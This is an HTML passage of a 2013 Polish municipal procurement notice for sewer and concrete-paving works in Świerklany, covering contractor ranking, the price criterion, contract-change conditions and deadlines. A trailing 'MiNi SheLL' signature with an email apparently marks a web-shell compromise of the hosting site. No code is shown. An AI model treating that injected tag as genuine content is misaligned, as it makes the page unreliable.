<p>Zamawiający sporządzi ranking Wykonawców, którzy spełniają warunki udziału w postępowaniu wg zasady: 
a)	za każdy 1 mb wykonanej kanalizacji sanitarnej grawitacyjnej lub deszczowej, z rur PVC Zamawiający przyzna 1 pkt. 
b)	za każdy 1 m2 wykonanej nawierzchni jezdni dróg i/lub miejsc parkingowych z kostki brukowej betonowej wraz z podbudową Zamawiający przyzna 1 pkt. 

W przypadku gdy Wykonawca powoła się na wiedzę i doświadczenie podmiotów, o których mowa w art. 26 ust. 2b ustawy Pzp w celu wykazania spełniania warunku udziału w postępowaniu opisanego w pkt. III.3.2) ponad minimalny zakres, tj. ponad 3.000 mb kanalizacji sanitarnej grawitacyjnej lub deszczowej, z rur PVC oraz ponad 3.000 m2 nawierzchni jezdni dróg i/lub miejsc parkingowych z kostki brukowej betonowej wraz z podbudową, Zamawiający nie będzie uwzględniał potencjału tych podmiotów w punktacji podczas ramach sporządzania rankingu Wykonawców, tzn. nie będzie przyznawał dodatkowych punktów.

Zamawiający zaprosi do składania ofert pierwszych 5 Wykonawców, którzy uzyskają największą liczbę punktów.
 
Jeżeli w wyniku zastosowania oceny jak wyżej kilku Wykonawców uzyska identyczną liczbę punktów i będzie klasyfikowało się na pozycji 5., Zamawiający zaprosi do składania ofert wszystkich Wykonawców sklasyfikowanych na 5. pozycji.
Jeżeli liczba Wykonawców, którzy spełnią warunki udziału w postępowaniu będzie mniejsza lub równa 5, Zamawiający zaprosi do składania ofert wszystkich Wykonawców spełniających te warunki.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony mogą zmienić postanowienia zawartej umowy w zakresie terminu wykonania,  jeżeli:
a)	zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można uniknąć ani im zapobiec, w szczególności:
-	przedłużenie procedury udzielenia zamówienia publicznego;
-	warunki uniemożliwiające realizację robót budowlanych z przyczyn technologicznych; 
-	protesty osób prawnych i fizycznych dotyczące realizacji robót na ich posesjach;
b)	zaistniały odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie niezinwentaryzowanych podziemnych sieci, urządzeń lub obiektów budowlanych;
c)	zaistniały odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategoria gruntu, kurzawka, głazy itp.) skutkujące niemożnością realizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych;
d)	zaistniała konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;
e)	Zamawiający wstrzyma roboty z przyczyn leżących po jego stronie;
f)	zaistnieje brak frontu robót z przyczyn niezależnych od Wykonawcy robót budowlanych na okres powyżej 2 tygodni;
g)	wykonanie przedmiotu umowy jest uzależnione od wykonania zamówienia dodatkowego dla robót budowlanych;
h)	nastąpiła siła wyższa obejmująca: klęski żywiołowe, niewypały, niewybuchy, wykopaliska archeologiczne, gwałtowne opady, gradobicie, powodzie i inne anomalia klimatyczne;
i)	zajdą przesłanki określone w § 7 ust. 1 i 2 umowy.
2.	Strony mogą zmienić postanowienia zawartej umowy w zakresie wartości umowy, jeśli:
a)	zajdą przesłanki określone w § 5 ust. 3 umowy.
3.	Strony mogą zmienić postanowienia zawartej umowy w zakresie kierownictwa budowy, po spełnieniu warunków określonych w § 10 ust. 4 umowy.
4.	Strony mogą zmienić postanowienia zawartej umowy w zakresie osób pełniących nadzór inwestorski, zgodnie z zapisem § 11 umowy.
5.	Strony mogą zmienić postanowienia zawartej umowy w zakresie podwykonawców po spełnieniu warunków określonych w § 13 ust. 7 umowy.
6.	Strony mogą zmienić postanowienia zawartej umowy w zakresie zlecenia podwykonawcom wykonania części zakresu umowy, których konieczność zatrudnienia nastąpi z przyczyn od Wykonawcy niezależnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swierkalny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świerklany
ul. Świerklańska 54
44-264 Jankowice
Referat Inwestycji i Zamówień Publicznych - biuro nr 15, parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2013 godzina 17:00, miejsce: Urząd Gminy Świerklany
ul. Świerklańska 54
44-264 Jankowice
Sekretariat - biuro nr 21, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie nr 1 współfinansowane z Programu Rozwoju Obszarów Wiejskich na lata 2007-2013, działanie 321: Podstawowe usługi dla gospodarki i ludności wiejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com